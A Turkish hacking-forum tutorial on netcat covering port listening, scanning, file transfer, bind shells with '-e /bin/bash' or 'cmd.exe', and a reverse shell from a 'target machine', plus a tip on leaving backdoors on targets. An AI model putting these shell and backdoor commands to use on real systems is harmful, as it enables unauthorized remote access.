THT DUYURU

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.

chat
Seçenekler

Netcat Kullanımı

SeSa1453 - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
10/2012
Nereden:
Nahçıvan
Mesajlar:
10.121
Konular:
1527
Teşekkür (Etti):
6440
Teşekkür (Aldı):
4556
Ticaret:
(0) %
08-09-2014 18:33
#1
Netcat Kullanımı
Netcat Nedir?
TCP/IP üzerinden veri gönderme veya almaya yarayan network programıdır.Herhangi bir portu dinlemeye alabilir,bir adrese ve porta bağlantı sağlayabilirsiniz.Bu şekilde veri gönderimi yapabileceğiniz gibi sistemler arası komutlarda çalıştırılabilmektedir.
Bu yazımızda elimden geldiğince açık bir şekilde Netcat aracının temel kullanımı üzerinde duracağız.


Netcat ile bir portu dinlemeye almak
nc -l -v -p <dinlenilcekportnumarası> deyimiyle portu dinlemeye alabiliriz.Şimdi parametrelerimizi inceleyelim.
-l --> dinleme için gerekli parametre
-v --> yaptığımız işlemle ilgili daha fazla bilgi almak istiyorsak bu parametreyi arada kullanabiliriz.
-p --> port numarasını temsil eden parametre

Örnek
nc -lvp 443 --> 443 numaralı portu dinlemeye aldık.


UDP Portları Dinlemeye Almak

UDP portları dinlemeye almak tcp’den farklı olacaktır.UDP portlar için araya -u parametresi konulmalıdır.
nc -l -v -u -p <portnumarası> şeklinde udp portu dinlemeye alabilirsiniz.

Porta Bağlantı Sağlama
nc -v <hedefadres> <portnumarası> ile porta bağlantı sağlanabilir.(Telnet).Gönderilen veriler sunucu ve istemcide belirecektir.
nc -v - u <hedefadres> <portnumarası> --> UDP Porta bağlantı sağlama


Netcat ile Port Tarama
nc -v -z <host> <port aralığı> şeklinde port taraması yapılabilir. -z parametresini kullandığımızdan ekrana sadece açık portları listeler.

Netcat ile dosya transferi
nc -lvp 8888 > dosyadı -->portu dinlemeye aldık.Dosya dahil edildi.
nc -w 1 <host> 8888 < dosyadı -->Porta bağlanan dosyayı çekti.


Uzak bağlantı ve Komut Çalıştırma
Bazı durumlarda bağlantı sağlayınca shell’e yani kabuğa erişim sağlayıp komut çalıştırmak isteyebilirsiniz.Bu durumlarda -e parametresimden faydalanılır.

Linux İçin;
nc -l -v -p 8888 -e /bin/bash --> 8888 no’lu portu dinlemeye aldık.Porta erişim sağladığımızda kabuk üzerinde komut çalıştırabilicez.
nc -v localhost 8888 -->Portumuza bağlantı sağladık artık komutlarımızı çalıştırabiliriz.(id,ls vb)


Windows İçin;
nc -lvp 8888 -e cmd.exe --> Aynı şekilde 8888 nolu portu dinlemeye aldık bu porta bağlantı sağlanırsa cmd ekranına düşcez.
nc -v localhost 8888 --> Porta bu şekilde bağlanarak komut çalıştırabiliriz.



İPUCU:Yukarda örnekleri olduğu gibi hedef makinede backdoor(arka kapı) bırakılabilir ve uzaktan sisteme erişim sağlanabilir.

Reverse Bağlantı
Çoğu zaman uzak sistemlerde port açamayız bu durumlarda kendi makinemizde port açarız uzak sistemide bizim port’umuza yönlendiririz.
Bu bağlantı türüne reverse bağlantı denir.(diğeri ise bind bağlantıdır yani hedef makinenin portuna biz bağlanırız.)
Öncelikle portumuzu dinlemeye alıyoruz.
X Bilgisayarı --> Biziz
Y Bilgisayarı --> Hedef Makine

X Bilgisayarı: nc -lvp 8888 --> kendi makinemizde portumuzu dinlemeye aldık.

Y Bilgisayarı: nc -v localhost 8888 -e cmd.exe --> Kendi makinemize Y bilgisayarı üzerinden bağlantı sağlıyacağız.

Bağlantıyı aldığımız an Y Bilgisayarı üzerinde komut çalıştırabilir hale geçiceğiz.(localhost örnek amaçlı)



Resimde görüldüğü gibi portumuzu açtık dinledik hedef makineden bağlandık(burda localhost) ve hedef makine bize bağlandığından hedef makinenin komut satırına erişebildik.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler